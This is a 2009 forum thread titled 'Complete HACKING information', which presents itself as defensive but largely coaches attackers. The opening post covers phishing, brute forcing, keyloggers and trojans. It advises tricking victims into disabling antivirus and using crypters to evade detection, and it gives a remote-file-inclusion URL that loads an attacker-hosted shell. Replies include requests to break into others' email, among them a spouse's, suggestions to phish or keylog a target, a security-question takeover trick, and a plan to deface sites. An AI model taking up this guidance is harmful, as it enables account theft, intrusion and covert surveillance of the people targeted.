Go4Expert

Go4Expert (http://www.go4expert.com/)
-   Ethical hacking Tips (http://www.go4expert.com/articles/ethical-hacking-tutorials/)
-   -   Complete HACKING information (http://www.go4expert.com/articles/complete-hacking-information-t16514/)

indiansword 12Mar2009 00:19

Complete HACKING information
 

Introduction:



We see a millions of people going to different forums and websites and asking "how do i hack an email?", "Can you hack blah for me?". So thought to create a tutorial which will give you the basic idea about what the heck is a "HACK", and how to DEFEND YOUR SELF AGAINST HACKERS.

Disclaimer:



As i have seen controversies in the past, here is the disclaimer.

I or the staff of Go4expert.com's does not take any responsibility if you use this tutorial in unethical way. This is written to help you to beware of whats going around, and save your self by not being hacked!

Background:



Hacking started way too far when the windowsd 98 was designed. Hacking is basically finding out the loop holes and trying leak some information out of it, which may lead you to get some critical information like passwords, credit card details. Sometimes hacking is done just because of the personal offesnses.

Things to remember

I will suggest you, KEEP READING ARTICLES AND TUTORIALS FROM GOOD SITES. THATS THE ONLY WAY YOU CAN LEARN.

Initialization:



Getting back to the main point, I am going to discuss some of the ways of hacking in brief. Hacking is basically bifurcated in 2 major parts.

1. Email or the user information
2. Web based hacking.

Email or user information:



These days the most commonly used and famous way of hacking user information like Emails, Passwords, Credit card details are as follow:

a. Phishing
b. Brute Forcing
c. Keylogging
d. Trojans

a. Phishing:
Phishing is basically a massive attack. What a hacker does is, they created an absoulutely look alike page of some website like yahoo or gmail. They upload it to their own server. And give the link to any n00b user. When they open it, they think that they are on the yahoo or gmail page, they put in their username and password, click on submit and WHOA! your information has been submitted. This is widely used by new people trying to entering into ahcking world.
Most recent example in india was some scam with ICICI bank, lots of user info was stolen as far as i remember. I read it somewhere in the news paper and was thinking what the hell! ?

Disadvantages: Still many people give it a try before going for phishing, because the only problem in phishing is, even if the victim knows a little about internet, he will read the URL and understand that it is not a genuine website.
b. Brute Forcing
Brute forcer is basically a program which could be called as a "cracker". In brute focer you put the username you want to hack, and as a password you put a notepad file which has almost all of the existing english words in it. So what it does is, it will try each and every word from that file and see if anything matches. You might have noticed some topics like "huge pass list" on different forums, they are nothing but the password list to put into your bruteforcer.!

Disadvantages:
1. Sometimes brute forcing may just go for ages!
2. It isnt guaranteed
3. These days many people have alpha-numeric-symbol password which is real tough for brutefocer to detect
4. Most of the famous sites like yahoo, gmail are designed in such a way that it will put the "image captcha" after 3 incorrect login attempts, which stops the bruteforcer.

P.S:- I have made some focused FTP, Gmail & Yahoo bruteforcers which are avilable on my website.
c. Keylogging
Keylogger helps you to create a little filed which is known as "server". You gotta send your server to the victim. he has to click on it and then YOUR DONE! this is what happens.
Best possible way to hack someone. Keyloggers are basically a program which will install themselves in your victim's computer and will keep on recording each and every keystroke pressed by the victim on his keyboard and it will send it to the hacker. There are many ways to receive the keystroke i.e. FTP, Email, Messengers. According to me this is the best way to trick your victim and get their information :D

Disadvantages :
1. When victim receives the keylogger, in most of the cases, their anti virus would auto delete them. So you have to convince them to desable the anti virus by bluffing something.
2. Sometimes firewall blocks the keylogs from being sent.

Tips :
1. There are some programs which are known as "crypters" which will help you to make your server's undetectable. So your victim's anti-virus would not be able to detect them.
d. Trojans:
Trojans are like father of keyloggers. Trojan sends you the keylogs just as keyloggers, on top of that, it lets you take the control of victim's computer. Edit / delete/ upload / download files from or to their computer. Some more funny features like it will make their keyboard go mad, it may kep on ejecting and re-inserting the cd ROM. Much more..

Disadvantages :
Same as keyloggers.

Tips :
Same as keylogger.

Web Hacking:



I will discuss some most commonly used web hacking techniques which helps hackers to hack any website. This will help you to SAVE YOUR SITE!

1. SQL Injection
2. XSS
3. Shells
4. RFI
5. There are some more but they are TOOO big to be discussed in here.

1. SQL Injection:
Most of the websites these days are connected to an SQL Database. Which helps them to store usernames and passwords [encrypted] when a guest registers to their website. SQL database processes a querie everytime a user logs in. It goes to the database, validates the password, if its correct then it logs in the user and if its not then it gives an error.
So the basic funda is executing a command to parase a query in the database to try to exploit the internet information of the database. I cant really put the entire tutorial about because this is the most complicated way to hack the website! :)

P.S.:- If you wanna check if YOUR website is vulnerable to RFI attach or not then do the following .

If your site's URL is:
Code:

yoursite.com/index.php?id=545
just add a ' like this at the end
Code:

yoursite.com/index.php?id=545'
2. XSS:
XSS is another nice way to ahck some website. Suppose if some website/ forum is allowing HTML in the psot or articles, then a hacker can post a malicious script into the content. So whenever a user opens up the page, the cookies would be sent to the hacker. So he can login as that user and f*ck the website up.
3. Shells:
Shell is a malicious .php script. What you have to do is, find a palce in any website where you can upload any file like avatars, recepie, your tricks, your feedbacks. And you try to upload your shell files from there. And if its uploaded then WHOA!you open it from the URL bar and u can see the entire "FTP" account of that webhosting. YOu can rename/edit / upload/download anything u want including the index page.
This is also known as deface.
4. RFI:
RFI is a good way to deface a website. It is used with shell. Suppose you have uploaded your shell on:
Code:

yoursite.com/shell.txt
and you found a vulnerable site to RFI... then you can do as follow:
Code:

victimssite.com/index.php?page=yousite.com/shell.txt
This will again give u the access of your victim's sites FTP , just as shell so you can f*ck up anything you want.

P.S.:- If you wanna check if YOUR website is vulnerable to RFI attach or not then do the following .

If your site's URL is:
Code:

yoursite.com/index.php?id=545
just add something liek this at the end
Code:

yoursite.com/index.php?id=http://www.google.com
And if it incldes the google page into your page, that means its vulnerable to RFI.
ENJOY!
eXCLUSIVELY BY ME!

indiansword 12Mar2009 01:50

Re: Complete HACKING information
 
Yea, and video tutorials for "SHELLS" & "SQL Injection" is already posted, if you may wanna check them out

SMS campaign 13Mar2009 09:04

Re: Complete HACKING information
 
any one have knwoladge how to get the hacking site.

TriG0rZ 20Mar2009 01:18

Re: Complete HACKING information
 
wow, thanks for the information man! well apriciated.

indiansword 20Mar2009 13:29

Re: Complete HACKING information
 
Quote:

Originally Posted by TriG0rZ (Post 44586)
wow, thanks for the information man! well apriciated.

thanks for reply, i was really sab that no one replied :D

AymanEF 26Mar2009 13:49

Re: Complete HACKING information
 
for bruteforcer can you do little more different like if u need to check a password for 8 digites and choose if the password is letters only or alpha-numeric

so that the program generates his own list without putting a list on a notepad

indiansword 26Mar2009 23:24

Re: Complete HACKING information
 
yea there is a php file for that, i dont have it right now, coz i m in the office, will post it as soon as i reach at home

uttampegu 6Apr2009 03:01

Re: Complete HACKING information
 
Thanx for the info! Specially about the Keyloggers!

shabbir 6Apr2009 15:02

Re: Complete HACKING information
 
Article of the month competition nomination started here

shabbir 17Apr2009 14:15

Re: Complete HACKING information
 
Vote for this article as Article of the month

thebestbuddy 1May2009 09:26

Re: Complete HACKING information
 
hey i want to hack a hotmail account password ..can anyone tell me how to do it???send replies to thebestbuddy007@gmail.com

mayjune 25Jun2009 00:56

Re: Complete HACKING information
 
nice post, nice work...

udefined 12Jul2009 17:41

Re: Complete HACKING information
 
nah its better to use SQLinjector

the most easy hack tool

elitepirate 1Aug2009 11:56

Re: Complete HACKING information
 
superb tut!!!

where are the video tut's posted???

im interested :p

reddyschintuo 7Aug2009 18:08

Re: Complete HACKING information
 
clear cut idea about hacking.worth read post

dense 27Aug2009 04:46

Re: Complete HACKING information
 
im interested in grey hat hacking. i hav some really creative ideas but lack the recources to impliment them! ive watched every youtube tut on the subject & tried pretty much all above mentioned methods. ie sql, java inj, keyloggers & progs like poisen ivy & bi frost. i tried tamperdata. i registerd on hackthissite & completed variouse missions. i also tried kane & able to crack md5 hashes. none of these methods hav so far worked! i need to find a way to gain access to a website as admin!! its not that im lazy & cant be bothered to find out info. its just that none of the info ive been given is @all usefull. where can i find specific info on this subject that is effective ennough to actually be implimented in the real world?! ive wasted ennough time on this & ive been getting nowhere!!!!!!!!!! i need tutorials that work from scratch & go into specifics in a user friendly format that works step by step rather than using broad strokes. id rather find the information i was given was extremelyover simplified or even patronising as @ leat this reduces margin for error signifficantly. thx.

mayjune 27Aug2009 04:54

Re: Complete HACKING information
 
@dense
hmm looks like you have gone tired too of the waste given on net as if its the most coolest way to hack...good...
I guess only two poeple who can really help you out, hex0010 and indiansword...as they are quite good at all this...
if you have anything specifc you are looking for, you can ask them for it i am sure they'll give you some idea how to go about it...

dense 27Aug2009 16:36

Re: Complete HACKING information
 
this post is directed to either the great hex0010 or indiansword... or indeed anybody with any actual working knowledge of the specific procedures im going to mention here. first off a little more about me (& why it is important i have access to this information). i am sombody with very little experiance of hacking. infact im pretty crappy @ it but i am however a great conceptual artist. i have skills in grafiti bombing, im also a particularly dope dj & music producer so with the correct tools @ my disposal i would produce a standard of work that would be highly creative & origeonal. i dont just want to write "u got hacked" across sombodys page.... um no. what i ultimately do is mimic the design of the whole site but screw with it in a way that provokes thought & has genuine style. thus i dont want to just pick random websites really. id like to exploit sites belonging to organisations that exploit people! :) now on to what i need....
i need a way into a website that gives me as much control as possible over content (ie the ability to post mp3 players & alter the background art or maybe even post a video or 2). i also need if poss to be able to lock the existing admin out of thier own site? the other thing i need is a software that allows me to gather information & gain control of a remotely operated pc? again i want to make the "experiance" for the victim as surreal & annoying as possible. so as much scope for creativity as possible would be apreciated! now bear in mind ive come accross software that claims to do this but i think 1 of the main problems i faced was that the tutorials were incomprehensive difficult to follow. wot i need is ennough information to ensure i can physiccally get it to work? thx.

indiansword 29Aug2009 04:16

Re: Complete HACKING information
 
Quote:

Originally Posted by dense (Post 56284)
infact im pretty crappy

LOLed.


Quote:

Originally Posted by dense (Post 56284)
this post is directed to either the great hex0010 or indiansword... or indeed anybody with any actual working knowledge of the specific procedures im going to mention here. first off a little more about me (& why it is important i have access to this information). i am sombody with very little experiance of hacking. infact im pretty crappy @ it but i am however a great conceptual artist. i have skills in grafiti bombing, im also a particularly dope dj & music producer so with the correct tools @ my disposal i would produce a standard of work that would be highly creative & origeonal. i dont just want to write "u got hacked" across sombodys page.... um no. what i ultimately do is mimic the design of the whole site but screw with it in a way that provokes thought & has genuine style. thus i dont want to just pick random websites really. id like to exploit sites belonging to organisations that exploit people! :) now on to what i need....
i need a way into a website that gives me as much control as possible over content (ie the ability to post mp3 players & alter the background art or maybe even post a video or 2). i also need if poss to be able to lock the existing admin out of thier own site? the other thing i need is a software that allows me to gather information & gain control of a remotely operated pc? again i want to make the "experiance" for the victim as surreal & annoying as possible. so as much scope for creativity as possible would be apreciated! now bear in mind ive come accross software that claims to do this but i think 1 of the main problems i faced was that the tutorials were incomprehensive difficult to follow. wot i need is ennough information to ensure i can physiccally get it to work? thx.


After reading it, i understand that u have creativity. But that isnt all that u r supposed to have.
1.First of all, Saying "i want to hack a site", doesnt give more information about it. You need to be more specific in terms of the type of the website, i.e. if its a forum,blog, customer made script, normal html etc etc...
2. You asked "if i can kick out the admin from his own website". It is possible in terms of getting administrator previlages but that wudn't be permenent. Because admin can anytime login to his cpanel and remove the existing file, use the same database and restart the website.
3. If we get access to cpanel and take it over... then he can contact hosting provider and get access back anytime.

So u can takeover the website... but it also depends on the smartness of the actual admin... there is also a possibilty that he may try to track u back . If the web hosting provider is smart then wireshark can easily track u down and then u know govt.s are just waiting for someone to get caught to set an example.

So my advise: if u dont know stuffs, better not try things in live enviroment. Install WAMP server on ur computer and try the things u know.

divengrabber 21Sep2009 19:00

Re: Complete HACKING information
 
cool thats very informative.

hanleyhansen 21Sep2009 22:16

Re: Complete HACKING information
 
Excellent!!

ponchcola 30Sep2009 20:08

Re: Complete HACKING information
 
hi i js want to know how to open other people yahoo.account

ponchcola 30Sep2009 20:09

Re: Complete HACKING information
 
pls help me.because my husband hide to me something in his yahoo profile i want to check him

Nathan437 14Nov2009 20:12

Re: Complete HACKING information
 
Awesome tutorial! Helped me get started.

eightlives 7Dec2009 23:26

Re: Complete HACKING information
 
Thanks for the post, really informative. :)

Jawwal 17Dec2009 00:25

Re: Complete HACKING information
 
Thanks for the first lesson ops I mean information ... by the way there is an easy way to hack with wpe-pro but now it`s difficult ,I wonder if you explane why ?

learn3r 19Dec2009 12:00

Re: Complete HACKING information
 
Quote:

Originally Posted by thebestbuddy (Post 46792)
hey i want to hack a hotmail account password ..can anyone tell me how to do it???send replies to thebestbuddy007@gmail.com

the article says it all... Try to keylog or phish the user. Or sometimes guessing can be handy if the user is a bit noob. For example, some people put passes like their phone numbers, girlfriend's name, their favourite color, idols, etc. which can be guessed pretty easily.

Quote:

Originally Posted by udefined (Post 52272)
nah its better to use SQLinjector

the most easy hack tool

Using tools is always noobish act. A kid of 8 who can copy and paste the URL will also be able to hack and deface the websites if he uses such tools. So I suppose, its better to learn how things are working rather than using the tools and thinking that I am leet haxx0r.

technica 24Dec2009 15:06

Re: Complete HACKING information
 
good article to read. Thanks for sharing the information.

palakanit 22Mar2010 19:26

Re: Complete HACKING information
 
cool info...and its very interesting.

David8888 26Mar2010 18:24

Re: Complete HACKING information
 
Quote:

Originally Posted by indiansword (Post 44239)
yea, and video tutorials for "shells" & "sql injection" is already posted, if you may wanna check them out

mmmmmmmm

ali_akbar 2Apr2010 20:12

Re: Complete HACKING information
 
thankx 4 all the information i really appreatiate it.

jordanmorgan14f 3Apr2010 01:50

Re: Complete HACKING information
 
Hello this is FBI Agent Jordan Morgan, Detroit Sect and we are tracking your computers right now....


































APRIL FOOLS!

indiansword 3Apr2010 02:45

Re: Complete HACKING information
 
Nice to see this post still getting read.

@JordanMorgan14f :- lol nice

ali_akbar 3Apr2010 19:26

Re: Complete HACKING information
 
well brother can u hel me .
i just want to know what are thes all file types like php,exe ???
n how should i use them n wher which 1 should i use .. plz if u send me all the inf abt it then plz reply me.


Quote:

Originally Posted by indiansword (Post 66610)
Nice to see this post still getting read.

@JordanMorgan14f :- lol nice


Script.kiddie 13May2010 00:27

Re: Complete HACKING information
 
Its Good

MOHAMMED SHAREEF 21May2010 11:33

Re: Complete HACKING information
 
Simple way to hack..........not guarenteed.........it works only with your friends,or relatives gmail id...........

Enter to gmail..
Dont enter your username or password..
Clink the link shows cannot acces to my account
clik the link forgot password
then enter the below link password recovery
submit the user id you want to recover
they ask the security question.. User select
most of them selects there 1st phone no?foolishness!!!!!!!
If you know about there personal information..........then hacking is simple

devilxone 22May2010 13:48

Re: Complete HACKING information
 
great post dude, :P

chelsieisabel 23May2010 06:17

Re: Complete HACKING information
 
Hi i was wondering if someone can do me a big favor. Please :) . Some one hacked my old account and I really want it back before they really mess with it or write my friends, I've tried to hack it back, but I really do not understand how to do it :( . Can someone please teach me or maybe even be sweet enough to do it for me :). I'd really appreciate it :).

chelsieisabel 28May2010 02:59

Re: Complete HACKING information
 
can someone please help me. my yahoo was hacked and i would really appriciate it if someone can please help me get it back. ive tryed all i can but the person who hacked it changed all my information. idk how else to get it back :/ please help

lordmayor 5Jun2010 19:00

Re: Complete HACKING information
 
Am interested in that too, please if any one can help in that admin stuffs please inbox me adonispeniel@yahoo.com
Quote:

Originally Posted by dense (Post 56241)
im interested in grey hat hacking. I hav some really creative ideas but lack the recources to impliment them! Ive watched every youtube tut on the subject & tried pretty much all above mentioned methods. Ie sql, java inj, keyloggers & progs like poisen ivy & bi frost. I tried tamperdata. I registerd on hackthissite & completed variouse missions. I also tried kane & able to crack md5 hashes. None of these methods hav so far worked! I need to find a way to gain access to a website as admin!! Its not that im lazy & cant be bothered to find out info. Its just that none of the info ive been given is @all usefull. Where can i find specific info on this subject that is effective ennough to actually be implimented in the real world?! Ive wasted ennough time on this & ive been getting nowhere!!!!!!!!!! I need tutorials that work from scratch & go into specifics in a user friendly format that works step by step rather than using broad strokes. Id rather find the information i was given was extremelyover simplified or even patronising as @ leat this reduces margin for error signifficantly. Thx.



All times are GMT +5.5. The time now is 11:58.